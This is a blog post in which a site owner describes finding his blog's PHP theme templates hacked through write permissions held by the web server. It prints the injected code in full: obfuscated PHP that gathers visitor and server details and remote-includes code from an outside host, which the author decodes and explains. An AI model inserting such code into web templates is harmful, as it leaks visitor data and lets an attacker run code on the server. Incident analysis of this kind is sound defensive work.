A while ago I found the website irresponsible while administrative dashboard remained worked fine. It appeared to be a problem with hosting or ISP from the start but later when the problem did not appear to be going to go, I decided to check if my theme files are writable by the web server… and I found the engine of the blog hacked and hacked exactly through mentioned loophole.
It is convenient to have theme files accessible for write through web server because it allows theme modification using dashboard but this is insecure and finally someone used this. The update of the theme files seems to be automated (batch operation) because file some whitespace and formatting was lost (this may be a consequence of modification through engine dashboard though) and < /html> tag was stripped from the templates.
The following code was inserted into PHP template immediately before the < /body> tag (inserted once per source code file into last PHP < ? tag before the < /body > tag, to be exact):
error_reporting(0);
$a=(isset($_SERVER[“HTTP_HOST”]) ? $_SERVER[“HTTP_HOST”] : $HTTP_HOST);
$b=(isset($_SERVER[“SERVER_NAME”]) ? $_SERVER[“SERVER_NAME”] : $SERVER_NAME);
$c=(isset($_SERVER[“REQUEST_URI”]) ? $_SERVER[“REQUEST_URI”] : $REQUEST_URI);
$g=(isset($_SERVER[“HTTP_USER_AGENT”]) ? $_SERVER[“HTTP_USER_AGENT”] : $HTTP_USER_AGENT);
$h=(isset($_SERVER[“REMOTE_ADDR”]) ? $_SERVER[“REMOTE_ADDR”] : $REMOTE_ADDR);
$n=(isset($_SERVER[“HTTP_REFERER”]) ? $_SERVER[“HTTP_REFERER”] : $HTTP_REFERER);
$str=base64_encode($a).”.”.base64_encode($b).”.”.base64_encode($c).”.”.base64_encode($g).”.”.base64_encode($h).”.”.base64_encode($n);
if((include_once(base64_decode(“aHR0cDovLw==”).base64_decode(“dXNlcjcucGhwaW5jbHVkZS5ydQ==”).”/?”.$str))) { } else
{ include_once(base64_decode(“aHR0cDovLw==”).base64_decode(“dXNlcjcucGhwaW5jbHVkZS5ydQ==”).”/?”.$str); }
What is this? “aHR0cDovLw==” means “http://”, “dXNlcjcucGhwaW5jbHVkZS5ydQ==” stands for “user7.phpinclude.ru” and thus server and visitor information was sent to remote hacker’s server http://user7.phpinclude.ru/? … I am using this opportunity to say “Hi” or “Preved”, whichever is more appropriate, to our new friends from Russia…By the way, Google knows a lot about these guys already.